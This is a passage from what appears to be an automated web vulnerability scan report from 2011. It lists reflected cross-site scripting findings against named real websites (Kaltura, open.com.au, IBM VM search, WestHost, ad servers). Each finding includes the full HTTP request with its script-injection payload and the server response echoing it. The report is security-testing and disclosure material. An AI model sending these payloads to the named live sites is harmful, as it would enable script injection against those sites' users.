GET //api_v3/index.php?service=multirequesta52f6<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>1674c55387c&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:19 GMT
Server: Apache
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 313
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><error><code>SERVICE_DOES_NOT_EXISTS</code><message>Service "multirequesta52f6<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>1674c55387c" does not exists</message>
...[SNIP]...

4.229. http://www.open.com.au/cgi-bin/sf.cgi [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.open.com.au
Path:   /cgi-bin/sf.cgi

Issue detail

The value of the config request parameter is copied into the HTML document as plain text between tags. The payload 1003c<script>alert(1)</script>146720b57e0fba7c6 was submitted in the config parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cgi-bin/sf.cgi?formname=Radiator+eval&config=radiatoreval.cfg1003c<script>alert(1)</script>146720b57e0fba7c6&companyname=&address1=&address2=&city=&state=&postcode=&country=&contactname=&contactemail=&contactphone=&environment=&selection=&testplan=&select=-----Please+choose----&Hearaboutother=&comments=&Submit=Submit HTTP/1.1
Host: www.open.com.au
Proxy-Connection: keep-alive
Referer: http://www.open.com.au/radiator/evaluation.html
Cache-Control: max-age=0
Origin: http://www.open.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 424

<html><head><title>Form Error</title></head>
<body><h1>Form Error</h1>
<strong>Your form was not successfully processed
because an error was encountered:</strong>
<p>'/usr/local/etc/superForm/radiatoreval.cfg1003c<script>alert(1)</script>146720b57e0fba7c6' is not readable
<p>
...[SNIP]...

4.230. https://www.open.com.au/cgi-bin/sf.cgi [config parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /cgi-bin/sf.cgi

Issue detail

The value of the config request parameter is copied into the HTML document as plain text between tags. The payload f7f03<script>alert(1)</script>c6383949c232fa0b2 was submitted in the config parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cgi-bin/sf.cgi?formname=Online+order&config=onlineorder.cfgf7f03<script>alert(1)</script>c6383949c232fa0b2&currency=%2Fonlineorder.php%3Fcurrency%3DAUD&companyname=&address1=&address2=&city=&state=&postcode=&country=&contactname=&contactemail=&contactphone=&selectREmail=Select+from+the+drop+down+list+below&NosYearREmail=&ExtraRCombined=Select+from+the+drop+down+list+below&NosYearRCombined=&ExtraAA=Select+from+the+drop+down+list+below&NosYearAA=&invoice+to=&paymenttype=Credit+Card&cardtype=Select+Credit+Card+type&cardnumber=&cardname=&billing=&billing2=&expiry=&ccemail=&ppemail=&ppcurrency=PP-USD&ttemail=&ttcurrency=TT-USD&chequeemail=&chequecurrency=TT-USD&comments=&Submit=Submit HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: https://www.open.com.au/onlineorder.php
Cache-Control: max-age=0
Origin: https://www.open.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 423

<html><head><title>Form Error</title></head>
<body><h1>Form Error</h1>
<strong>Your form was not successfully processed
because an error was encountered:</strong>
<p>'/usr/local/etc/superForm/onlineorder.cfgf7f03<script>alert(1)</script>c6383949c232fa0b2' is not readable
<p>
...[SNIP]...

4.231. https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.open.com.au
Path:   /onlineorder.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba00"><script>alert(1)</script>b572d924b04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineorder.php/cba00"><script>alert(1)</script>b572d924b04 HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Referer: http://www.open.com.au/howtobuy.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OSC Secure Online Order Form</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
<option value="/onlineorder.php/cba00"><script>alert(1)</script>b572d924b04?currency=AUD" selected>
...[SNIP]...

4.232. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /search/search.cgi

Issue detail

The value of the FILTER request parameter is copied into the HTML document as plain text between tags. The payload ff3eb<script>alert(1)</script>b5a99c2eb65 was submitted in the FILTER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/search.cgi?WORDS=xss&HOW=AND&FILTER=ff3eb<script>alert(1)</script>b5a99c2eb65 HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/

Response

HTTP/1.0 200 OK
Server: z/Web-server_for_VM+SSL/1.6a z_VM/5.4.0.1101 CMS/24.003 REXX/4.02 CMS_Pipelines/1.0110
MIME-Version: 1.0
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZ" lang="en-ZZ">
<h
...[SNIP]...
<br>
Confine to: FF3EB<SCRIPT>ALERT(1)</SCRIPT>B5A99C2EB65<br>
...[SNIP]...

4.233. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /search/search.cgi

Issue detail

The value of the FILTER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ad39"><script>alert(1)</script>5f10bbc3a83 was submitted in the FILTER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/search.cgi?WORDS=xss&HOW=AND&FILTER=8ad39"><script>alert(1)</script>5f10bbc3a83 HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/

Response

HTTP/1.0 200 OK
Server: z/Web-server_for_VM+SSL/1.6a z_VM/5.4.0.1101 CMS/24.003 REXX/4.02 CMS_Pipelines/1.0110
MIME-Version: 1.0
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZ" lang="en-ZZ">
<h
...[SNIP]...
<INPUT NAME="FILTER" VALUE="8AD39"><SCRIPT>ALERT(1)</SCRIPT>5F10BBC3A83" SIZE="30">
...[SNIP]...

4.234. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /search/search.cgi

Issue detail

The value of the WORDS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bd45"><script>alert(1)</script>7b3b43e10d2 was submitted in the WORDS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/search.cgi?WORDS=xss2bd45"><script>alert(1)</script>7b3b43e10d2&HOW=AND&FILTER= HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/

Response

HTTP/1.0 200 OK
Server: z/Web-server_for_VM+SSL/1.6a z_VM/5.4.0.1101 CMS/24.003 REXX/4.02 CMS_Pipelines/1.0110
MIME-Version: 1.0
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZ" lang="en-ZZ">
<h
...[SNIP]...
<INPUT NAME="WORDS" VALUE="XSS2BD45"><SCRIPT>ALERT(1)</SCRIPT>7B3B43E10D2" SIZE="30">
...[SNIP]...

4.235. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vm.ibm.com
Path:   /search/search.cgi

Issue detail

The value of the WORDS request parameter is copied into the HTML document as plain text between tags. The payload d0f8e<script>alert(1)</script>fbe5cdd5f92 was submitted in the WORDS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/search.cgi?WORDS=xssd0f8e<script>alert(1)</script>fbe5cdd5f92&HOW=AND&FILTER= HTTP/1.1
Host: www.vm.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/

Response

HTTP/1.0 200 OK
Server: z/Web-server_for_VM+SSL/1.6a z_VM/5.4.0.1101 CMS/24.003 REXX/4.02 CMS_Pipelines/1.0110
MIME-Version: 1.0
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ZZ" lang="en-ZZ">
<h
...[SNIP]...
</h4>
Targets: xssd0f8e<script>alert(1)</script>fbe5cdd5f92<br>
...[SNIP]...

4.236. http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/bluegradbg.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b72b"><script>alert(1)</script>701445012d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7b72b"><script>alert(1)</script>701445012d5/bluegradbg.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15732
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="url" value="/images7b72b"><script>alert(1)</script>701445012d5/bluegradbg.gif" />
...[SNIP]...

4.237. http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/bluegradbg.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a411"><script>alert(1)</script>930f6d4d7e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/bluegradbg.gif?4a411"><script>alert(1)</script>930f6d4d7e4=1 HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15735
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="url" value="/images/bluegradbg.gif?4a411"><script>alert(1)</script>930f6d4d7e4=1" />
...[SNIP]...

4.238. http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/boxtopbackground.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fda9"><script>alert(1)</script>9316ccaf111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images9fda9"><script>alert(1)</script>9316ccaf111/boxtopbackground.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15738
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="url" value="/images9fda9"><script>alert(1)</script>9316ccaf111/boxtopbackground.gif" />
...[SNIP]...

4.239. http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /images/boxtopbackground.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e0"><script>alert(1)</script>a5bdb951eb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/boxtopbackground.gif?305e0"><script>alert(1)</script>a5bdb951eb7=1 HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15741
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="url" value="/images/boxtopbackground.gif?305e0"><script>alert(1)</script>a5bdb951eb7=1" />
...[SNIP]...

4.240. http://adnxs.revsci.net/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38c9'-alert(1)-'50eeb4fd55b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b38c9'-alert(1)-'50eeb4fd55b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:55:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:55:14 GMT
Content-Length: 502

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.google.com/search%3Fhl=en%26q=b38c9'-alert(1)-'50eeb4fd55b&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A%252F%252Fwww.tmz.c
...[SNIP]...

4.241. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32487"-alert(1)-"5378a7a6f40 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=32487"-alert(1)-"5378a7a6f40
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4BF66A695A7A0897C2D1CCCA70A7FC60; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=32487"-alert(1)-"5378a7a6f40",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   req
...[SNIP]...

4.242. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fdc67<a>a5c9c6f1d3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fdc67<a>a5c9c6f1d3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
